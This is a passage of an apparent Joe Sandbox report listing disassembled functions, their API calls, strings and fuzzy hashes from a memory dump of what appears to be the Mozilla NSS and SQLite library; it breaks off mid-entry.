Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID: /G6/
API String ID: 2334702667-570549270
Opcode ID: ff455569dff3187ab9d00a347fccf4c6fa370b577a6e3a8bccfbb9e8e5595a0b
Instruction ID: 39d1630aeed06f9ab2774c3edfa10cd0ef87b9307f9827cba18eca0b5086a428
Opcode Fuzzy Hash: ff455569dff3187ab9d00a347fccf4c6fa370b577a6e3a8bccfbb9e8e5595a0b
Instruction Fuzzy Hash: 9FA1DF72A002199FDB24CF54CC84BEAB7B5EF49308F0480A9ED496B781E731AD85CF91

Function 6C79A970 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

/G6/, xrefs: 6C79A985

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID: /G6/
API String ID: 0-570549270
Opcode ID: 93fc9d500ab231798ba21ef43990b5e368831ffe37a8ca9a8b30ea1a2741cfc2
Instruction ID: ebf42477a4fa20f179607f5b41aac3e49b0ea1d38090b42200cadee3f761b121
Opcode Fuzzy Hash: 93fc9d500ab231798ba21ef43990b5e368831ffe37a8ca9a8b30ea1a2741cfc2
Instruction Fuzzy Hash: B4914D30D061684FCB25CE1CAE927DAB7B6AF4A33CF1481F5C59A9BA01D6318D85CBD1

Function 6C7AED00 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C7AED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C7AEDCE

Part of subcall function 6C7A0BE0: malloc.MOZGLUE(6C798D2D,?,00000000,?), ref: 6C7A0BF8
Part of subcall function 6C7A0BE0: TlsGetValue.KERNEL32(6C798D2D,?,00000000,?), ref: 6C7A0C15

free.MOZGLUE(00000000,?,?,?,?,6C7AB04F), ref: 6C7AEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7AEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C7AEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7AEEFB

Strings

/G6/, xrefs: 6C7AED17

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID: /G6/
API String ID: 3768380896-570549270
Opcode ID: 54ffdaabbf19c9d26e12120e0c9a6fb8994544f0016ef9e0a12ce19748f8acfc
Instruction ID: 079728a0cbb31914127913d579488938ac0c54c0e9a51e9751290abd23af8a2e
Opcode Fuzzy Hash: 54ffdaabbf19c9d26e12120e0c9a6fb8994544f0016ef9e0a12ce19748f8acfc
Instruction Fuzzy Hash: B4816EB5A002099FEB14CF99DA85AAB77F5FF88308F144638E81597751D730E826CBA1

Function 6C6DE890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C6DE922
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6DE9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C6DEA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6DEB20
memcpy.VCRUNTIME140(?,?,?), ref: 6C6DEB57

Strings

foreign key on %s should reference only one column of table %T, xrefs: 6C6DEE04
unknown column "%s" in foreign key definition, xrefs: 6C6DED18
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C6DEDC2

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: 7161d519647285fc07fb8e88ceb07bd4d028b7a847e6092b57f4c21c9d044dd5
Instruction ID: cc604369829438349e95f1def955ae5a56e3682ac131cda61be3f42f64d5aa73
Opcode Fuzzy Hash: 7161d519647285fc07fb8e88ceb07bd4d028b7a847e6092b57f4c21c9d044dd5
Instruction Fuzzy Hash: E1028F71E016098FDB14CF99C580AEEF7F2BF89318F2A41A9D815AB751D731B841CBA4

Function 6C732D20 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C732D69

Strings

winTruncate2, xrefs: 6C732EF8
winTruncate1, xrefs: 6C732EBE
winSeekFile, xrefs: 6C732E9C
/G6/, xrefs: 6C732D2C
winUnmapfile1, xrefs: 6C732F55
winUnmapfile2, xrefs: 6C732F7F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: __allrem
String ID: /G6/$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-4060909793
Opcode ID: 28ce009dbcc3a7d9c8e8c84447f5b654623024b6b6f7e874f65b656e24f17089
Instruction ID: 4353d9055c9769d39a4b91279b98db4639712eff23088350304dbf8c9b52ae6b
Opcode Fuzzy Hash: 28ce009dbcc3a7d9c8e8c84447f5b654623024b6b6f7e874f65b656e24f17089
Instruction Fuzzy Hash: 7E61A171B002159FDB54CF68DD88A6A7BB1FF89318F108538E9199B782DB35A806CBD1

Function 6C798B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C798B93
PL_strncasecmp.NSS3(?,OID.,00000004), ref: 6C798BAA
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C798D28
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C798D44
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C798D72

Strings

OID., xrefs: 6C798BA4
/G6/, xrefs: 6C798B6C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CopyErrorItem_L_strncasecmpUtilmemcpystrlen
String ID: /G6/$OID.
API String ID: 4247295491-374447977
Opcode ID: 54a9484264843ff918b7127541b8608342f7d398f9d9e0f69789277a6509cf34
Instruction ID: f776c30a43fc75a5c578d76b49e4442e62b82694e943a665ed6050772d060505
Opcode Fuzzy Hash: 54a9484264843ff918b7127541b8608342f7d398f9d9e0f69789277a6509cf34
Instruction Fuzzy Hash: B85137B1F011298BCB20CA18ED8179AB3B4EB5A35CF0445FBE919DBB52D3309D85CB84

Function 6C7ACCF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7ADAE2,?), ref: 6C7AC6C2

PR_Now.NSS3 ref: 6C7ACD35

Part of subcall function 6C809DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C850A27), ref: 6C809DC6
Part of subcall function 6C809DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C850A27), ref: 6C809DD1
Part of subcall function 6C809DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C809DED

Part of subcall function 6C796C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C741C6F,00000000,00000004,?,?), ref: 6C796C3F

PR_GetCurrentThread.NSS3 ref: 6C7ACD54

Part of subcall function 6C809BF0: TlsGetValue.KERNEL32(?,?,?,6C850A75), ref: 6C809C07

Part of subcall function 6C797260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C741CCC,00000000,00000000,?,?), ref: 6C79729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7ACD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C7ACE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C7ACE2C

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C7ACE40

Part of subcall function 6C7A14C0: TlsGetValue.KERNEL32 ref: 6C7A14E0
Part of subcall function 6C7A14C0: EnterCriticalSection.KERNEL32 ref: 6C7A14F5
Part of subcall function 6C7A14C0: PR_Unlock.NSS3 ref: 6C7A150D

Part of subcall function 6C7ACEE0: PORT_ArenaMark_Util.NSS3(?,6C7ACD93,?), ref: 6C7ACEEE
Part of subcall function 6C7ACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7ACD93,?), ref: 6C7ACEFC
Part of subcall function 6C7ACEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7ACD93,?), ref: 6C7ACF0B
Part of subcall function 6C7ACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7ACD93,?), ref: 6C7ACF1D

Part of subcall function 6C7ACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7ACD93,?), ref: 6C7ACF47
Part of subcall function 6C7ACEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7ACD93,?), ref: 6C7ACF67
Part of subcall function 6C7ACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C7ACD93,?,?,?,?,?,?,?,?,?,?,?,6C7ACD93,?), ref: 6C7ACF78

Strings

/G6/, xrefs: 6C7ACCFC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID: /G6/
API String ID: 3748922049-570549270
Opcode ID: 81c6074be98d3a23564c8121671ffc18d7186ab0ed316ff6ee6841f81fcafe7b
Instruction ID: f40962987c7ccffe65e642194eef9a9ef10aea616107d7ab627d5884c3100e9f
Opcode Fuzzy Hash: 81c6074be98d3a23564c8121671ffc18d7186ab0ed316ff6ee6841f81fcafe7b
Instruction Fuzzy Hash: E751C676A04100AFEB10DFA9DE44B9A77F8EF48349F250634D95597740EB32E906CBD1

Function 6C77EEF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C77EF38

Part of subcall function 6C769520: PK11_IsLoggedIn.NSS3(00000000,?,6C79379E,?,00000001,?), ref: 6C769542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C77EF53

Part of subcall function 6C784C20: TlsGetValue.KERNEL32 ref: 6C784C4C
Part of subcall function 6C784C20: EnterCriticalSection.KERNEL32(?), ref: 6C784C60
Part of subcall function 6C784C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C784CA1
Part of subcall function 6C784C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C784CBE
Part of subcall function 6C784C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C784CD2
Part of subcall function 6C784C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C784D3A

PR_GetCurrentThread.NSS3 ref: 6C77EF9E

Part of subcall function 6C809BF0: TlsGetValue.KERNEL32(?,?,?,6C850A75), ref: 6C809C07

free.MOZGLUE(00000000), ref: 6C77EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C77F016
free.MOZGLUE(00000000), ref: 6C77F022

Strings

/G6/, xrefs: 6C77EEF9

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID: /G6/
API String ID: 2459274275-570549270
Opcode ID: e65faf73360e3268428ca072202acc2838bb394f1297bb30d4a1b5fa0036f51b
Instruction ID: 35fbec7322d55eee2066ad0a653a4e77358656a15dcc2668d1cc81cb0d9a9c1f
Opcode Fuzzy Hash: e65faf73360e3268428ca072202acc2838bb394f1297bb30d4a1b5fa0036f51b
Instruction Fuzzy Hash: 5D41A1B1E0010DAFDF118FA9DE48AEE7AB9AF48358F004039F914A6751E7718915CBA1

Function 6C812F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C812FFD
sqlite3_initialize.NSS3 ref: 6C813007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C813032
sqlite3_mprintf.NSS3(6C87AAF9,?), ref: 6C813073
sqlite3_free.NSS3(?), ref: 6C8130B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C8130C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C8130BB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 33ca690bad89f6bc72296de31bfd390176ac0fefd57e486c562ca1d213a95ae8
Instruction ID: abe5577226dd01700195ef655d49893368011821d69db6bf8d54be01119077dd
Opcode Fuzzy Hash: 33ca690bad89f6bc72296de31bfd390176ac0fefd57e486c562ca1d213a95ae8
Instruction Fuzzy Hash: 3641C171604A06AFDB20CF25D984A8AB7E5FF44368F148A28EC1987F40E771F995CBD1

Function 6C754860 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C754894

Part of subcall function 6C79B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8718D0,?), ref: 6C79B095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7548CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7548DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C7548FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C754912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C75494A

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

Strings

/G6/, xrefs: 6C754872

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID: /G6/
API String ID: 759476665-570549270
Opcode ID: 8a0a74781c12c7d539997b4c4c45da91488623bf081ce4a5cfebf460b52af7dd
Instruction ID: f7678e6715fa58841635da6a9a672b8edd72d73da97a91191d3b72c56dd1fbbd
Opcode Fuzzy Hash: 8a0a74781c12c7d539997b4c4c45da91488623bf081ce4a5cfebf460b52af7dd
Instruction Fuzzy Hash: 7941F3B1A04305ABE714CF6ADA85BAB77E8AF4461CF40053CEA5587741FB30E928DB52

Function 6C7D8AF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,00000000,?,?,6C7C6F38), ref: 6C7D8B0B
NSS_OptionGet.NSS3(00000008,?), ref: 6C7D8B58
NSS_OptionGet.NSS3(00000009,?), ref: 6C7D8B6A
NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,?,?,00000000,?,?,6C7C6F38), ref: 6C7D8BBB
NSS_OptionGet.NSS3(0000000A,?), ref: 6C7D8C08
NSS_OptionGet.NSS3(0000000B,?), ref: 6C7D8C1A

Strings

/G6/, xrefs: 6C7D8AF8

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Option$AlgorithmPolicy
String ID: /G6/
API String ID: 927613807-570549270
Opcode ID: 2fa9a4425a6f40544432bd00ac9e118c4334d6ee305b099ed9774bcda363928a
Instruction ID: f9260d02082a353a9eeab74b3b2d4bced8eed11bb6d0306a4da345e08f0a9555
Opcode Fuzzy Hash: 2fa9a4425a6f40544432bd00ac9e118c4334d6ee305b099ed9774bcda363928a
Instruction Fuzzy Hash: 38418961B0120887EF119F99EE843BE36B5DB4030CF861532CC4BDBA80E7647A45C7C6

Function 6C76CF40 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C76CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C76D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C76D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C76D025
PR_NewLock.NSS3 ref: 6C76D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C76D074

Strings

/G6/, xrefs: 6C76CF49

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID: /G6/
API String ID: 3361105336-570549270
Opcode ID: 356f9b13b78d404e13d5e79a3510da73a16964982169209dc9a8b009cc407273
Instruction ID: 51800cbbbe3662e32e2953c724950bd9b2f38abb2cc9ade57b89ce6f1c86327f
Opcode Fuzzy Hash: 356f9b13b78d404e13d5e79a3510da73a16964982169209dc9a8b009cc407273
Instruction Fuzzy Hash: CE41D0B1A013118FDB10DF2ACA8879A7BA4EF18319F21417ADC198FF46D770D885CBA5

Function 6C7B8890 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000004,?), ref: 6C7B88C0
PK11_HashBuf.NSS3(00000003,?,?,?), ref: 6C7B88E0
NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C7B8915
HASH_ResultLenByOidTag.NSS3(00000000), ref: 6C7B8928
PK11_HashBuf.NSS3(00000000,?,?,?), ref: 6C7B8957
PK11_HashBuf.NSS3(00000004,?,?,?), ref: 6C7B8980

Strings

/G6/, xrefs: 6C7B889F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: HashK11_$AlgorithmPolicy$Result
String ID: /G6/
API String ID: 2238172455-570549270
Opcode ID: cd92440a57e2336cd4fdaea69856372c4fa072f04a66ac81b7ed039e30964d0c
Instruction ID: 7b1ec26232d3e835c6df58230e3be5292dcd9e8b91583ac6389f96e07326e7d4
Opcode Fuzzy Hash: cd92440a57e2336cd4fdaea69856372c4fa072f04a66ac81b7ed039e30964d0c
Instruction Fuzzy Hash: 7C31C8B2904117ABFF009EA5DE45BAB7B98AF05318F140536EE14A7A81F7319A1483E7

Function 6C74AE50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C74AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C74AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C74AEDD
